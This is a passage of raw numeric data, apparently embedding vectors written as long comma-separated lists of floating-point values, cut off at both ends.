26258272,0.00026559408,0.011896424,-0.012552469,-0.01561953,-0.012945029,-0.021593576,0.046469443,-0.015971346,-0.009066746,0.017137585,-0.019760579,-0.0017362192,0.020194348,0.026452295,-0.025643239,0.0072142105,-0.011767109,0.0052236,0.018334867,0.020556489,-0.00739982,-0.004009265,-0.0024144258,0.019421842,0.0027574967,-0.012571649,0.000007921153,-0.00666233,0.004878677,0.022606872,0.023019657,-0.004249462,-0.019486621,-0.022582805,0.0034829476,0.0072979084,0.012156427,0.009485503,-0.014485281,-0.00636991,0.0031410276,0.00591787,0.0023518023,-0.019002967,-0.012089007,0.0060070744,-0.005583341,-0.0026891439,0.036324948,-0.01018762,-0.013408442,0.0020544047,-0.0060475715,-0.0074419323,-0.014237784,0.031486664,0.005150866,-0.01144491,0.00009364316,-0.0007271638,0.01862131,-0.008356975,0.00824855,0.019193405,0.029861234,-0.00084036565,-0.0051264176,0.00010862233,0.022761025,-0.02773058,0.00866307,-0.0066318754,0.013664512,-0.016323272,-0.014033237,-0.008147078,-0.0054463674,-0.00074163236,0.000019232766,-0.039090715,-0.008259857,-0.023105478,0.0059941625,-0.005200925,-0.03650332,0.00060763356,0.0029173333,-0.015619866,0.010405916,-0.010402126,-0.0052861967,0.007965838,0.00097118755,0.0026828963,-0.005319988,-0.0023816072,-0.0033298908,-0.0011133223,0.0037249704,0.018230278,0.0103523005,0.002814388,-0.0053715967,0.008967154,-0.0059624016,0.03166679,-0.012012651,-0.019173512,0.046706304,0.003383385,0.0001667955,-0.008228217,0.02461555,0.0051570325,0.040202565,0.012547707,0.03140279,-0.018011931,-0.01016895,0.033018216,0.008825078,-0.0002919765,0.012158567,0.016092494,0.010543857,0.0035050414,-0.0082621435,0.011726982,0.017193269,0.018437473,0.019380689,0.009463348,0.015653007,-0.018886734,-0.020814722,-0.02319474,0.021629434,0.020697914,-0.0062803584,0.02830281,0.025815282,0.023346553,-0.018749233,-0.011011358,0.01039621,-0.019321172,-0.022480227,-0.0023577344,-0.0018123883,0.011365492,-0.009291777,0.015867934,0.033788577,0.014708863,-0.011331174,0.007803215,0.0012266226,0.018744737,0.007137213,-0.0061233738,-0.0043467027,0.0064203446,-0.006566242,0.023483343,0.017784825,-0.0042206934,-0.012930144,0.004022318,0.011053073,-0.0008766835,0.014047928,0.006152745,-0.005596771,-0.016419252,-0.014862657,-0.0063553317,0.014573128,-0.016702753,0.021824228,0.00154667,-0.019862007,0.021716919,0.032579664,-0.0061311983,-0.0011711863,0.01316864,0.029767765,0.022612134,-0.005265027,-0.018845513,-0.017983498,-0.018463008,-0.029472472,-0.010449344,-0.0054005273,-0.006792756,-0.016375171,0.012378429,-0.019190354,-0.010072234,0.050678294,-0.0090362085,0.0143915545,0.009371217,-0.011056597,0.002296015,0.028666513,0.007302967,0.015363943,-0.028994674,0.01985372,0.001756984,-0.028523576,0.0122702615,-0.025525227,-0.00044539344,0.006921946,-0.009351271,-0.013091945,-0.02463371,0.0042294287,-0.012133304,-0.007647455,0.01244795,-0.012747766,-0.005841825,0.0072192014,0.008141077,0.018896524,-0.019753797,0.003758881,0.03892669,0.01710397,-0.005730298,-0.01894524,0.029948635,0.010223296,0.022937778,0.003476132,-0.022778783,0.010857456,0.013371588,0.015639536,0.010221807,-0.009007496,0.012114228,-0.0040081535,0.024332339,-0.016390055,-0.03865749,0.0049598836,0.02735575,0.002913902,0.01232851,-0.0037773256,0.00031635235,0.00048156877,0.005230731,-0.0003795437,-0.011002384,0.002329989,0.014619613,-0.0047587794,-0.00901276,0.0014833749,-0.02307776,-0.0031027182,-0.0021373886,0.00579848,-0.009297014,0.014369416,-0.016869485,0.021544198,0.016903453,0.012835356,0.02223011,0.014004028,-0.018298792,0.028135074,-0.013276594,0.018284077,0.0075483616,0.016501728,0.022545505,0.021927183,0.009980779,0.005999143,0.001962326,-0.021725936,0.028339563,0.039049,-0.008729118,-0.017452361,-0.002554557,0.005953159,-0.016243087,-0.021464393,0.010288948,0.044487514,0.0079482645,0.0014189973,-0.019566182,-0.0060324124,-0.0023035416,-0.037090726,0.040741783,-0.0052347444,0.027441505,-0.008262517,0.0022092604,-0.0036800269,0.004284341,-0.024915168,-0.031066064,-0.012046265,-0.033739433,-0.017445102,-0.018715983,-0.009331919,-0.01368474,-0.014722225,0.017117148,0.0030021688,0.03229386,0.00773089,0.006797319,-0.009062408,-0.010012786,-0.017039701,-0.011896941,-0.0008358698,0.034749493,-0.003527239,-0.0015307174,0.010994478,-0.005645734,-0.0011262543,0.049454037,0.007674106,-0.028002989,-0.0044798655,0.004802814,0.00034673227,-0.012261559,0.0153832175,-0.004517916,-0.009772684,0.016457444,-0.021820802,0.02358321,-0.014420587,-0.015217229,-0.0085495785,-0.0008377201,-0.008802973,-0.0025079856,0.016190259,0.00016228016,-0.0024258741,0.015690511,0.018659653,0.01605853,0.0021045676,0.013000184,-0.013523261,0.010719454,-0.0066355187,0.004563056,-0.011903929,0.0071687317,-0.024918897,-0.0068392307,-0.023987148,0.02082485,-0.038680352,-0.003724083,-0.0046214606,0.013269137,0.006340576,0.0069089644,-0.008190127,-0.004890252,0.006781011,0.0010536072,-0.01303816,-0.02005809,-0.011690203,0.028215898,0.00073516916,-0.009243916,0.01050453,0.008109297,-0.00042542798,0.058388,0.009969399,-0.0036801924,0.008067398,0.004395776,0.02225444,0.025240086,0.0053211753,0.000017161345,0.013228553,-0.020164909,0.006279877,-0.017554406,0.00975598,0.02179751,-0.010366158,0.011803205,-0.0038473043,0.000017791115,-0.037643045,0.004669762,0.0023660264,0.012145601,0.018243859,-0.018045278,0.0063299625,0.027202878,0.03641227,0.033573903,-0.004577083,0.00016222885,0.005624489,0.0052219126,0.019110013,-0.012178902,-0.04758066,0.016182445,0.092766285,0.0015661515,-0.008952725,0.03547363,-0.0013366486,0.009549368,-0.09807726,-0.00007519915,0.008035469,0.013402576,0.016280856,-0.020954005,-0.015535845,0.015528338,0.0007863706,-0.017692298,-0.010940651,-0.017799232,0.034065425,-0.009027616,0.007020927,0.01622394,-0.004826977,-0.00041568512,-0.037528474,-0.010459106,-0.010749834,0.0054172995,-0.0020323046,-0.004778615,-0.018461972,-0.006744765,0.021594726,-0.015441959,-0.0330186,0.020309487,-0.0018843838,-0.015810257,-0.010056917,0.010238685,0.015780848,0.013473257,-0.026759421,-0.022277283,-0.12928098,-0.0003757413,-0.0026891378,-0.038703177,0.013133406,-0.025580635,-0.021353157,0.0036505146,0.012102814,0.014592565,0.0077186823,0.025827713,0.0030131263,0.0012852229,-0.026244432,-0.006640247,0.0070866197,-0.000658325,-0.009117293,0.0076937135,-0.010068168,-0.02054879,0.00093363,-0.027474308,-0.018748416,0.011687604,-0.0128720505,0.033589274,-0.00503414,0.0004058765,-0.01985633,0.025825765,-0.036664564,-0.020474412,-0.0054916497,-0.006000714,-0.0015970932,0.008553074,0.0023508545,0.035157632,0.0009848105,0.015801737,-0.003709524,0.0154678365,-0.008920913,0.02241494,0.0018727295,0.026563413,0.018842572,-0.0023467615,0.020435294,0.024761342,-0.027672833,-0.00067892525,-0.0128282495,0.015841046,-0.0014614271,0.0062841293,-0.01646579,-0.011216514,-0.007691087,-0.014329592,-0.024039969,-0.016978722,0.02746113,-0.02104166,-0.0026277774,-0.03760108,0.0000897121,-0.000912758,-0.006711031,-0.0014487468,0.0023851073,-0.00032669498,0.0014867515,0.012341412,0.0019683053,0.0125570055,0.027369764,-0.0040803906,0.021643262,0.0036821605,0.0053749587,-0.03997903,0.035283893,-0.028568668,-0.000024657436,0.030754093,-0.010509798,-0.030786615,0.021488689,-0.022470953,0.003985344,0.0020586778,0.02415414,0.0025508516,0.05280404,-0.025660787,-0.028407548,0.0018546814,0.0006703441,-0.01779613,-0.0011048657,0.0029201903,-0.013336947,0.013961356,-0.0028543107,-0.03353432,-0.014322214,-0.0058493726,-0.019156836,-0.009303039,0.027342396,0.0029755249,-0.02404783,-0.015173126,0.00451136,0.018476103,0.0008394324,-0.012535936,-0.025364606,0.0011959029,-0.024013111,0.031946555,0.02857258,0.02329033,-0.030718263,-0.009546803,-0.00283184,-0.0031955193,-0.010999773,0.017081425,0.00037758163,0.00981834,-0.027457437,-0.001609902,-0.018089192,-0.019664438,-0.04931342,-0.0058197146,0.0115046315,0.0031423795,0.023364699,0.0036048733,0.018928392,-0.021621874,0.021099346,-0.0063095,0.005094582,0.016042631,0.0070406892,0.0054023312,-0.043424238,-0.021805696,-0.008769288,0.040569257,-0.014909997,-0.011560459,0.016425533,-0.003023237,0.010129293,0.021951873,-0.022185963,0.010460097,-0.012204358,-0.041024294,0.011606052,-0.0065728724,0.0023749694,-0.019749373,0.031153109,0.009846182,0.014112586,-0.013288643,0.023679625,0.012230785,-0.0015589936,0.00036272669,0.016738666,0.0039842622,0.0015225878,0.0065733586,0.0061543942,-0.01402997,-0.018594481,0.016581459,-0.015859164,-0.0020735858,0.0026972527,0.0030628461,-0.036182225,-0.0007585,0.007914321,0.004439573,-0.016163431,-0.00006470729,0.012784351,0.0011429744,-0.014593363,0.0061576692,-0.0034328823,-0.005508385,-0.018385366,0.0075996816,-0.017292779,0.008522243,0.037618507,-0.0048037353,-0.010813302,-0.017637275,-0.015543746,0.0023751247,0.0029808898,0.0064437,-0.0035425317,0.020527856,-0.00812005,-0.0097604105,-0.017717786,-0.009005353,0.00855056,-0.01267575,-0.0033952347,0.016129525,0.019748226,-0.012807727,-0.0011708457,-0.025390517,0.0008188295,0.003027278,-0.010133878,-0.02089503,0.0012326988,-0.0098421015,0.016132258,0.0145459175,0.011240314,0.016885769,0.0023168677,-0.008665433,-0.041253485,0.0022795866,0.03565662,-0.014049144,-0.012566196,0.008155675,-0.000013311136,0.03150996,0.0046260897,0.0014701495,0.0030051207,0.009560247,0.0037520276,0.020836998,-0.0071069216,0.006205485,0.0016587096,0.010900978,-0.015058569,-0.003889064,-0.025968043,0.0042351526,-0.01054144,0.036588807,0.011949204,0.018668614,-0.01495523,0.015635101,-0.028894702,0.0012363795,0.026039405,-0.012500182,-0.016850116,0.015585187,-0.0009825001,0.0029642347,0.013086466,0.0152814,0.008694231,0.00024228632,-0.035329472,0.021511687,-0.0037608256,-0.019111838,-0.0010990428,0.006777641,0.02411253,0.0004241886,0.0012117666,-0.018329663,0.0024837644,-0.0016766996,0.01944661,-0.010666759,0.024296768,-0.015913012,-0.013864938,0.0027029158,0.0131300725,0.013220416,0.01659267,-0.0013844622,0.012185398,0.002611001,0.0034950024,-0.026482012,0.010222898,-0.0078524975,-0.0039093588,0.013271877,0.011116197,-0.0028575966,-0.02150495,-0.00886822,0.0035856273,0.013900342,0.00090715784,0.009129914,-0.0015219548,-0.020132676,0.030176291,0.029279966,-0.014541283,0.023471601,-0.0013421121,0.019192932,-0.010106868,-0.004718603,0.00016426375,0.011196662,-0.01993347,0.023683807,-0.0075900555,0.0023277288,-0.022384964,0.0061358917,0.009421824,-0.01564063,-0.0017745227,0.000010982296,0.019835293,-0.01929929,0.02284708,-0.011769414,-0.024804031,-0.022829423,0.012109739,0.0012550623,-0.012313741,-0.037033617,0.0055560637,0.02624354,-0.0006257391,0.0014100733,0.0043463428,-0.0016454909,0.021578135,-0.009741086,-0.021027112,-0.015598495,0.009815514,0.009283632,-0.020118536,0.019588191,0.019466689,0.0062386664,-0.00699426,0.004097293,0.0049455627,-0.025433073,-0.017846521,-0.00982446,0.022475474,-0.0008119358,-0.030313632,0.0058657913,-0.0015568286,-0.0024604579,-0.007477374,0.021247167,-0.01797377,-0.021798387,0.06642422,-0.0043395036,-0.005416176,0.005850792,0.009950397,0.023583354,-0.008187358,0.0006811619,-0.0187099,-0.007829863,-0.011068479,-0.04491898,0.002615198,0.0010856411,-0.03831031,-0.013754416,-0.01931733,-0.024692263,-0.0073213554,0.012537651,0.01913802,0.008504656,0.011212159,-0.0008885548,-0.02155653,-0.020772161,0.0030520181,0.01605752,-0.01739427,-0.003446171,0.025676051,-0.022300556,-0.028639933,-0.013150826,-0.0021044167,-0.012012245,-0.016146008,0.025014834,0.015875194,-0.0068853213,0.044426687,-0.0014873624,0.009220319,0.013979205,-0.0061747637,-0.0058121597,0.003340085,0.010034328,-0.013550098,0.00002945171,-0.018728096,0.017703207,0.040806167,0.013703133,-0.01524667,0.011772088,0.017881943,0.0028915503,0.0014739337,-0.0039900043,0.031421695,0.015832853,-0.006217107,0.01965937,0.015206657,0.0064433003,0.009489589,-0.009037442,0.011233361,0.0034767888,0.0020885211,0.010246111,0.0038200305,0.010177495,-0.009592041,-0.01267958,0.02858251,-0.012634207,0.014226025,0.018811312,-0.009668498,-0.0026461855,-0.003845854,-0.022015637,0.012443521,0.023525989,0.022383314,0.020491984,0.000022406599,0.01712124,0.033050224,0.002845646,0.0155374855,0.015580143,-0.010905264,0.023711842,-0.004292491,-0.01258166,0.02082327,-0.014853319,-0.006972302,-0.008915035,0.0011114681,-0.0023897795,-0.026474148,0.019611828,-0.03770398,0.019043455,-0.039325677,-0.008543439,-0.04617828,0.004445527,0.013961229,0.017744308,0.02135797,-0.051827226,-0.007218706,0.02322086,0.011894413,-0.007912583,-0.0024542452,0.016548984,0.0020751574,0.021159008,0.009800045,-0.009445532,0.0145857865,-0.031182995,0.0133981835,0.018402535,0.007048422,0.0075415676,0.010316887,0.015735688,0.03643806,-0.0007987558,-0.0031128342,0.010747143,0.0035951836,0.017050207,-0.005533067,-0.023172777,-0.020039191,0.0049144547,0.001014121,0.027254349,-0.0072838836,-0.012333677,-0.0028596264,0.019037899,-0.0052655903,0.010339623,0.0030065347,0.021931391,0.015977817,0.026204335,-0.023462957,0.0068594553,0.014805182,-0.00010574353,0.0012666958,-0.027240086,0.015057097,-0.016499098,0.010783655,0.009908376,-0.0039202515,0.0027270727,0.008750995,-0.028132109,0.011818644,-0.0068832696,-0.0042831656,-0.020565065,-0.020556053,-0.00010076448,-0.013020414,0.018962653,0.004000425,0.002274994,-0.0041303616,0.01039649,0.03806763,-0.0011840754,-0.018641392,0.025452536,-0.030114584,0.009189182,0.022117337,0.0025038328,-0.0147589445,-0.020121071,0.013593221,-0.012928692,-0.015548728,0.0037668932,0.040230833,0.0032680796,-0.0049534426,-0.023418082,0.011012146,-0.004665905,-0.004623926,0.029022416,0.006063494,-0.015471416,-0.00080943917,-0.0148187345,-0.002415194,-0.03984845,-0.090046495,-0.011338578,0.018025408,0.0028129693,-0.02071132,0.0019474074,0.0087768175,0.00836859,0.02410519,0.008459565,-0.013139654,-0.0019407416,-0.010140141,0.0017708242,-0.0034294499,-0.020126456,-0.021785576,-0.0065787905,0.010850428,0.0037969272,0.00046580352,-0.005489658,-0.0154535845,0.00562062,0.012429662,0.017345909,-0.00026553165,0.018587742,0.012675832,-0.020998055,0.004455189,-0.013517012,-0.01500524,0.022301372,-0.0534843,-0.003093623,-0.013796262,-0.00011725256,0.0032610397,0.024903031,0.0240168,0.012047235,0.008696416,0.011766437,0.016114721,0.0015778067,-0.018936098,0.01715993,-0.001626392,0.0029513335,-0.011985438,-0.015935369,-0.0058705676,-0.0060380646,-0.005191863,-0.021251705,0.003137929,0.005333381,0.0034989016,0.001054405,-0.0014000311,-0.019229028,-0.008787362,0.034453377,-0.009350291,0.01505358,0.012045686,0.015746398,0.012942938,0.014060158,-0.0062576183,0.0064103375,0.0064001726,-0.023628168,0.019208692,0.011510815,0.037313152,-0.000724552,0.012112582,-0.0027779592,0.0051940014,-0.00883094,-0.013356505,-0.001271348,-0.037814707,0.0035518715,0.0068465974,0.012791027,-0.017939825,0.008140654,0.017960282,0.016852958,-0.01852024,0.0573762,0.037560284,0.023081973,0.03684185,-0.008707608,-0.012131599,-0.012296477,0.004068839,-0.0070885215,-0.0036802143,0.004387301,-0.012937637,-0.002507436,0.01809059,-0.005047508,0.0083505055,-0.017844599,0.012487722,0.031751256,-0.0308139,0.015563684,0.004722689,0.027508495,-0.0016336995,-0.018585082,-0.0072205276,0.0015868909,0.015876707,-0.007051939,-0.01064041,-0.053911127,-0.0014038716,-0.019518722,-0.011374691,0.026775775,-0.025308691,-0.027049499,-0.004048118,0.024431638,0.01041395,-0.004040299,-0.013548008,0.008365045,-0.03519972,0.0065593547,-0.0013932992,0.0026464358,0.010704216,-0.005906515,0.015189459,0.0024107548,0.0045773704,0.004764206,-0.014553466,-0.009570808,-0.007974295,0.010528475,0.004875948,-0.010850074,0.022310782,0.009387781,-0.0014244327,0.0065550865,-0.016090367,-0.00635488,0.0017908097,0.004157623,-0.00036571725,0.024701398,0.041946325,-0.008264567,0.020479502,-0.01457374,-0.025321648,0.014101275,0.0025104915,0.004023467,-0.0060777366,-0.0045155976,0.023733575,-0.060945313,0.012514782,0.013851042,0.0006451478,0.00067136704,0.029935842,0.025550416,-0.03481441,0.013763053,-0.004877532,0.004192234,-0.0076639405,0.012698829,0.0059837694,0.0070963297,-0.009489969,0.0072103837,0.060085006,0.009818814,0.00008604972,-0.015563972,0.011223985,-0.013494583,-0.00019373013,0.0052233213,0.023568662,-0.008226072,-0.022934573,0.022037726,0.0020284385,-0.02671785,0.023778705,0.032595564,-0.001058894,0.04261259,0.0088090915,-0.0055502304,-0.024984851,0.019672094,-0.0039594714,-0.022087699,0.010981586,0.038251948,-0.002001297,-0.024284177,0.0076368093,0.009884145,-0.013515194,0.004462089,0.0049402914,0.011364071,-0.004929595,0.022513937,0.031964727,0.021146795,-0.009766964,0.001836811,0.0017166309,0.006043926,0.0020086267,0.0033520395,0.0022275602,-0.0050621107,0.010452968,0.00078660337,-0.00824777,-0.009723964,0.026010668,0.006118393,0.024490999,0.012398739,0.013292575,-0.000665313,-0.0155834835,0.009452167,0.007379594,0.02570154,-0.015804045,-0.0050216666,-0.012833775,0.008962227,0.0059124692,0.0034336378,0.0005071808,0.014401648,-0.013566021,-0.0018197711,0.0031146507,0.0074359747,-0.025591008,-0.0135455495,0.0015341275,0.023847371,-0.0021119996,-0.0039771744,-0.022310676,0.009280244,0.003942742,0.025562603,0.0017519341,0.0023744593,-0.008587184,-0.0077072536,0.026471484,-0.012311306,-0.0010383456,0.006701324,0.010273448,-0.010459331,0.005274062,0.020560272,0.00031576882,0.022447197,0.028549585,0.021378428,0.007801158,0.015378874,-0.0125333695,-0.013989981,0.007916604,-0.007211018,0.0015832805,0.032250106,0.011226509,-0.02138977,-0.0011628501,0.021556636,0.01047625,-0.023648934,-0.026687367,-0.0066611464,0.009148073,-0.029955218,0.004033016,0.024742687,0.006832432,-0.004938277,-0.0076499754,-0.004278464,-0.029115068,0.030550364,0.004000668,0.012157974,0.006471201,0.010450487,-0.017773883,-0.0037106911,0.0007176287,0.0036168492,0.00804171,-0.018935474,-0.03077484,-0.00839717,0.013853889,0.05365242,-0.019016383,-0.025317097,0.019898735,-0.012633143,0.007996068,-0.007541953,0.012531299,-0.01001028,0.011742292,0.031753957,-0.012996325,0.01745346,0.0053182286,0.029012168,-0.003540231,0.0017093918,-0.003551202,0.02994519,0.009374932,0.0046396805,-0.0125110345,0.004934792,-0.019600784,-0.004824599,0.0132831,-0.0060780207,-0.03515652,0.032959256,-0.035633832,0.0016368917,0.017263332,0.0049828566,0.0026487214,0.031442158,-0.0340692,-0.020212669,0.015976908,-0.007553407,-0.011460459,0.026908515,-0.006026041,0.019093227,-0.0067347423,0.023852319,-0.011084238,-0.01573049,0.010942782,-0.08226719,-0.009139705,-0.000009292237,0.0068137534,0.046451125,0.00087478285,-0.01185845,0.00038497878,-0.010137448,0.010332375,-0.014400082,-0.0011942369,0.00040277632,-0.0055055413,0.01732091,-0.028529199,-0.0051844865,-0.0014732038,0.013198049,-0.023188716,-0.0244194,-0.020737048,-0.0043947552,-0.011694922,0.022431271,0.01048749,-0.00609252,-0.023276448,-0.0016707629,0.0033973588,-0.005547191,-0.004987096,-0.031496964,-0.044584796,-0.024936631,0.010589956,0.010958267,-0.0020384917,0.010373727,-0.03591482,0.007867212,-0.011144416,-0.010708744,0.002449515,-0.041713774,0.0043175444,-0.017898431,-0.012678531,-0.023097934,-0.007776578,0.022479068,0.017824177,0.0038653135,0.036174424,-0.013643399,0.011460952,0.0058045858,0.008710335,0.041487865,-0.0032823826,0.0071781045,-0.019985262,-0.008214493,-0.015085842,0.010655963,0.009021805,-0.008690059,0.01639907,0.007262577,-0.009072815,-0.009669478,-0.011405472,0.014655762,-0.014571436,0.0050776633,-0.0110837305,-0.007495403,-0.002823552,-0.0026278172,0.0016407463,0.05356784,0.003399589,0.01996173,0.0064907046,-0.008234124,0.018799435,-0.010014867,0.008273521,0.022669787,-0.014874633,-0.010792049,-0.017048039,0.036535904,-0.0021561156,0.02238043,0.0031203923,-0.0103999665,0.0076599363,-0.032855507,0.006331873,-0.021770835,-0.0036743097,-0.015771553,-0.012729417,0.0018769449,-0.0028656335,-0.01951611,-0.0068238527,-0.011013953,-0.01283711,-0.0121118715,0.036804635,0.044646855,0.037324183,0.029168455,0.0029525764,-0.024576087,0.022478798,-0.00047754415,-0.016285554,-0.004922756,0.009991711,-0.018278627,0.018648949,0.004913584,0.017633209,-0.0013535377,0.0033610913,-0.011450238,0.0020799937,0.008693445,0.006061447,0.014997937,0.016900841,-0.0132607855,-0.007623565,0.003174114,0.020123336,-0.0014198655,0.019182548,0.008527015,0.007843699,-0.0095224045,-0.029629901,-0.0030480993,0.02293753,0.024466839,-0.0010244249,-0.0120706875,-0.031483535,-0.010871595,-0.0146918185,-0.017511994,0.021291193,-0.0067673507,-0.0026738376,-0.017133052,0.0204691,-0.018812276,-0.00935999,-0.01684938,0.022641806,0.0022282624,-0.0028471067,-0.016809024,-0.00074828207,0.013976071,0.009138943,-0.011472258,0.019430405,-0.0186547,-0.003203723,0.0060051023,-0.00916865,-0.018103283,-0.0023086562,0.0054481067,0.016809052,-0.028044038,0.0047979453,-0.01844053,0.009995123,-0.004678484,-0.005303098,0.0051794453,-0.004283159,0.024431352,0.018167047,-0.005135555,0.014479573,0.014991308,-0.0277057,0.006555208,-0.020692078,-0.0084535815,-0.015792055,0.0016575658,0.00074043154,-0.007563404,0.018405324,0.0079147145,0.008091576,-0.010736754,0.019984841,0.049917106,0.0136624575,-0.008957223,0.023638345,-0.026838973,-0.014648648,0.0034330569,-0.0028789027,0.034416065,0.07923453,-0.0012266174,0.0015638174,-0.016614059,0.019955708,0.0056028017,-0.010537981,-0.016031919,-0.003819443,0.0075032404,0.029265895,-0.0080257,0.017209573,-0.013918718,-0.011069747,0.026510019,0.01785615,-0.015121826,0.007746324,0.021343997,0.03086299,-0.0055535384,-0.007553511,-0.07649866,-0.014915799,-0.04743889,0.03235746,0.02428828,0.011888335,0.036759418,-0.0069718393,0.011542826,0.024435647,0.008896474,-0.03633099,0.0044957395,0.012761813,-0.007828437,-0.0069794385,-0.024746422,0.020035766,0.016163267,0.0019263738,-0.018883506,-0.031800844,-0.038216703,0.0018073968,0.008874166,0.032279383,0.014997148,-0.0059532193,0.008070197,0.018956453,0.014521273,0.019569976,-0.0033618433,0.00048143388,-0.011684581,0.0146439895,-0.00633937,0.01976328,0.02616693,0.019695722,-0.015678093,0.0031993994,-0.0004429357,0.0074927243,-0.0014802286,-0.011566195,0.0023764079,0.004355172,0.008645996,-0.007545838,-0.012165952,0.004093188,0.013844479,-0.007796273,0.003490025,0.007359296,0.00014664528,0.003350829,-0.005580363,-0.0017386171,-0.0029370945,-0.003812728,0.012146679,-0.014179073,0.027516967,-0.0015593371,-0.016247181,-0.003746389,0.019798389,0.019588731,0.03302958,0.005170103,0.014545301,0.018200107,0.00042998718,-0.010760325,0.004774225,-0.0076186676,-0.027853275,0.0013273013,0.0041056,0.0027002236,-0.013359205,0.0076586353,0.03196053,-0.009125713,-0.0030523224,-0.009031306,0.0038595821,-0.014620757,0.017065458,0.0035716705,0.030201076,-0.015360909,-0.0076586953,0.009509731,-0.020548992,-0.002535062,0.033060696,0.011916613,0.02797633,0.028453827,0.005340553,-0.011479064,-0.0070843366,-0.0077191787,-0.0018795693,0.01868796,-0.033164717,-0.009211388,0.009542439,-0.0067798924,0.011550247,0.02659032,-0.035515495,0.014123195,0.0072923503,0.010214232,-0.0045503573,0.013780321,0.0010910536,0.0034405848,0.0039798566,0.025232686,0.0065814373,0.012911639,-0.015040468,0.012279281,0.034260795,-0.00032601933,0.006697082,-0.005064989,-0.0032820636,-0.03757562,-0.00048497674,-0.0020369713,-0.025149768,0.024661597,0.014842281,0.013122315,-0.04710227,0.0047031315,-0.002253307,0.022172756,0.014108175,0.0041134018,0.02078853,-0.022720907,0.004488077,0.005410901,0.013564107,-0.011028957,0.0029367756,-0.0071450872,0.0007419985,-0.008866565,-0.009965881,-0.002756174,0.019140113,-0.0038631086,-0.0062919273,0.015064806,-0.022474227,0.028682314,0.019761397,-0.026538942,0.01589361,0.00084751187,-0.003828159,0.006277247,0.024886524,-0.0026596556,0.013672442,-0.01576086,0.03295904,-0.03100155,-0.022259094,0.013300921,0.007482562,0.009967762,-0.02479238,0.0054184883,-0.0059479177,-0.010072809,-0.016676754,-0.0015390354,-0.024208127,-0.0055945953,-0.0217561,-0.000572734,-0.026287006,0.0027396108,0.013357149,0.0028637804,-0.023595335,-0.0025392144,-0.020513553,-0.008704244,0.0030841401,-0.01503175,0.025008347,0.0019798784,-0.009257446,-0.009718142,0.011408798,0.0070539475,-0.016311698,-0.023295553,0.0073865647,-0.0047321906,-0.0034569597,-0.0035199265,-0.021506049,0.022363357,0.02485698,0.009534989,0.02119893,-0.004564116,0.03398503,-0.010391474,0.0031624772,0.01195884,0.010817758,-0.020483285,0.0063702334,-0.014340717,-0.0032946095,-0.01865777,-0.0020594269,-0.015837528,-0.013200055,-0.018119909,-0.016971262,-0.014703909,0.035558186,0.022453416,-0.033736475,0.026763927,0.005024761,-0.022480432,0.029306099,-0.010127612,0.00016374109,0.015727311,-0.016242756,-0.022640603,0.010937919,-0.0024233584,0.01952,-0.01338655,0.023286907,-0.005054265,-0.004437483,-0.014068495,0.011048784,0.002597945,-0.0051237233,-0.005088638,-0.037615914,-0.015050414,-0.0026813282,0.0014534974,-0.008620641,-0.0006691537,-0.012768154,0.0812963,-0.043873284,0.0014697434,0.0024880841,-0.021524139,-0.03176027,0.015464219,-0.018506847,-0.01631402,-0.026805779,0.0060647163,-0.0014695699,0.00669353,-0.027214129,-0.0028834583,-0.01196213,-0.024865007,-0.016516125,0.014478565,0.00034898362,-0.01489712,0.0318282,0.0030679964,0.0009941403,-0.010107447,0.011351082,-0.012483612,-0.025611863,-0.0047433437,0.0036994761,-0.0057344656,0.0013318318,0.03146831,-0.041191906,-0.005520474,0.009029614,0.016297916,0.01608148,-0.00010948804,-0.031933796,-0.009413708,-0.0018837666,-0.003336864,0.0025741325,0.03522459,-0.024908004,-0.016078342,0.0015565252,-0.0069467267,0.11551129,-0.02552116,0.010186288,-0.0023318247,0.02532447,-0.012994004,0.019954275,0.01608891,0.0014144288,0.0163603,0.0044463584,-0.016350426,-0.006224281,0.008869068,0.005240009,-0.0062453705,0.0011929021,0.13021995,-0.0085326675,-0.0024416682,-0.009657091,-0.00832039,0.016565645,-0.005551862,0.0019706525,-0.080844484,-0.016278896,-0.0063434644,0.014054505,0.00823565,-0.021494983,0.0322197,0.005948194,0.00038597747,0.0078066094,0.004106907,0.021266317,0.013860866,-0.020784695,0.0034571895,-0.0065963585,0.003627754,0.015187443,0.000677533,-0.01665091,0.041674428,-0.019225797,-0.0026812947,-0.018089043,0.020062506,0.020974128,-0.028626734,0.0075332257,0.017476896,0.016045172,0.0014960485,0.005563835,-0.024172293,-0.019798383,-0.007372595,-0.02303192,-0.007814134,-0.004448511,0.019014018,-0.005366352,-0.0003138927,-0.016252141,-0.0057559987,0.0059443642,0.04099305,-0.0024554355,-0.0041016247,-0.009757612,-0.0063694906,0.02233787,0.002812222,-0.009737342,-0.012972152,0.0075375284,0.03777872,-0.003261714,-0.0024108938,-0.02074751,0.011013458,0.011187729,-0.0035225847,-0.032039475,0.00522081,0.01675652,0.009188683,-0.009002849,-0.0016125223,0.005876389,0.004127847,-0.0139298225,-0.0073597524,0.0065092286,-0.018404447,-0.009175406,-0.02226612,-0.004484307,0.021425674,-0.022800235,-0.0021365345,-0.0020880282,0.020002533,-0.027694602,-0.02512304,0.008654125,-0.0021477472,0.0086551085,0.0056871357,-0.0002549833,0.0069889696,0.0015777141,0.00020510537,-0.017047955,-0.004139395,-0.020218862,-0.021726217,0.002282624,-0.018102825,-0.001653766,0.011916588,-0.02122531,0.020661395,0.024290679,-0.0012461124,-0.025417715,-0.007631242,-0.0164715,-0.0009991925,-0.034629967,0.046257872,0.0011757885,-0.0078092446,-0.005612238,-0.032656174,-0.035091326,0.0114809675,0.026183166,0.0029281655,0.006796334,-0.026555685,0.0008456263,-0.003851263,0.002041028,-0.0010824645],[0.013047179,0.0107101295,-0.028465535,-0.021687238,0.011851277,-0.027993595,0.007244052,0.03336551,-0.009927656,-0.007838511,0.0062706554,0.021240927,0.017819028,0.008027666,-0.012928698,0.002565794,0.0068856953,0.0015445247,0.0020777273,-0.022047943,-0.0009346127,-0.0009100766,0.030812848,0.008413602,0.00511664,-0.006130953,-0.0013793322,0.0006610489,0.0055618766,0.008013317,0.0048851455,0.025012404,-0.0026590428,0.025449086,0.0103073735,0.014020422,-0.022884341,-0.0068388316,0.010948278,0.0015345085,-0.004477058,0.01315498,-0.0020080209,0.036999457,0.0058381082,-0.004568231,-0.01005792,-0.0028468657,-0.022201749,0.0075543146,0.01030254,0.0058450107,-0.046799805,0.022239065,-0.0054591075,0.009845151,-0.0005477761,-0.034499213,0.008604659,-0.014454105,0.009170461,0.009964185,0.005722387,-0.019384028,0.016809715,-0.003332396,0.002472864,-0.033115443,-0.0046981587,-0.013906298,0.007556749,0.0035755094,0.005876516,0.002936723,0.024570726,0.025001286,-0.00726881,-0.013014776,-0.0